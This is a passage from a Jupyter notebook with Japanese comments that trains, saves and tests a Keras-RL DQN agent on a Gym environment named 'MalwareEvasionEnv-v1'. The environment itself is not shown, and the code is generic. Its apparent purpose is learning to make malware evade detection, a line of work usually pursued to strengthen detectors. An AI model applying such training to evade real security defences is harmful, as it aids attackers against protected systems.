    # エントリポイントは<名前空間>:<クラス名>というフォーマットに沿って記述する
    # ここではJupyter NotebookまたはGoogle Colaboratoryのセル中に環境が存在することを前提としている
)

In [ ]:
# OpenAI Gymをインポートする
import gym

# KerasおよびKeras-RLをインポートする
from tensorflow.keras.models import Sequential
from tensorflow.keras.layers import Dense, Activation, Flatten
from tensorflow.keras.optimizers import Adam
from rl.agents.dqn import DQNAgent
from rl.policy import EpsGreedyQPolicy
from rl.memory import SequentialMemory

# 一部環境でのエラー抑制用イディオム
import tensorflow as tf
tf.compat.v1.disable_eager_execution()

# 強化学習タスクの環境を初期化する
ENV_NAME = 'MalwareEvasionEnv-v1'
env = gym.make(ENV_NAME)
nb_actions = env.action_space.n

# Q関数の近似に用いるニューラルネットワークを定義する
# 状態空間の次元env.observation_space.shapeを入力、
# 行動空間の次元nb_actionsを出力としていれば、中間層は好きに積み重ねてよい
model = Sequential()
model.add(Flatten(input_shape=(1,) + env.observation_space.shape))
model.add(Dense(16))
model.add(Activation('relu'))
model.add(Dense(16))
model.add(Activation('relu'))
model.add(Dense(16))
model.add(Activation('relu'))
model.add(Dense(nb_actions))
model.add(Activation('linear'))

# Experience Replay用のメモリを用意する
memory = SequentialMemory(limit=50000, window_length=1)

# 行動ポリシーとして確率epsでランダムな行動をとらせるようにする
policy = EpsGreedyQPolicy(eps=.1)

# エージェントを初期化する
# DQNAgentの引数にはさきほど定義したネットワーク、行動空間の次元数、Exprerience Replay用のメモリ、
# 割引率、Target Q-Networkのアップデート頻度、行動ポリシーなどを指定する
dqn = DQNAgent(model=model, nb_actions=nb_actions, memory=memory, gamma=0.99, 
            target_model_update=1e-2, policy=policy)
dqn.compile(Adam(lr=1e-3), metrics=['mse'])

In [ ]:
# エージェントを学習させる
# ここでは10,000回の行動を通じてQ関数を近似している
history = dqn.fit(env=env, nb_steps=10000, visualize=True, verbose=2)

In [ ]:
# ニューラルネットワークの重みを保存する
dqn.save_weights('dqn_{}_weights.h5f'.format(ENV_NAME), overwrite=True)

In [ ]:
# 学習済のエージェントをテストする
# ここでは5回のエピソードにわたってエージェントをテストしている
dqn.test(env=env, nb_episodes=5, visualize=True)